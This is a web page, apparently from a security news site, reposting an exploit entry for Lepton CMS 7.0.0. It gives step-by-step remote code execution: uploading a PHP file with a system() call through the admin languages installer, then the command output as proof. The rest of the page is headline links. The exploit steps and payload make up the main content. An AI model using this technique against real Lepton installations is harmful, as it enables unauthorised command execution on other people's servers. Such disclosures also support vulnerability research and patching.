Home Tools Exploits & CVE's Lepton CMS 7.0.0 Remote Code Execution

Lepton CMS 7.0.0 Remote Code Execution

January 22, 2024

104

Authored by tmrswrr

Lepton CMS version 7.0.0 suffers from a remote code execution vulnerability.

## Exploit Title: LeptonCMS Version : 7.0.0  Remote Code Execution
### Date: 2024-1-19
### Exploit Author: tmrswrr
### Category: Webapps
### Vendor Homepage: https://www.lepton-cms.com/
### Version : 7.0.0
### Tested on: https://www.softaculous.com/apps/cms/LEPTON

1 ) Login with admin cred   >  https://127.0.0.1/LEPTON/backend/login/index.php
2 ) Go to Languages place   > https://127.0.0.1/LEPTON/backend/languages/index.php
3 ) Upload upgrade.php file in languages place > <?php echo system('id'); ?>
4 ) After click install you will be see result

### Result :  uid=1000(lepton) gid=1000(lepton) groups=1000(lepton) uid=1000(lepton) gid=1000(lepton) groups=1000(lepton)

Lepton CMS 7.0.0 Remote Code Execution

Follow us on Instagram @thecyberpost

EDITOR PICKS

Organizations patch CISA KEV list bugs 3.5 times faster than others,...

Ukraine records increase in financially motivated attacks by Russian hackers

NATO and EU condemn ‘intensifying’ Russian sabotage and hybrid operations

POPULAR POSTS

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

Domhttpx – A Google Search Engine Dorker With HTTP Toolkit Built...

POPULAR CATEGORY

WG Ticket 1.0 Cross Site Scripting

Backdoor.Win32.Spion4 Insecure Transit

Magic Home Pro 1.5.1 Authentication Bypass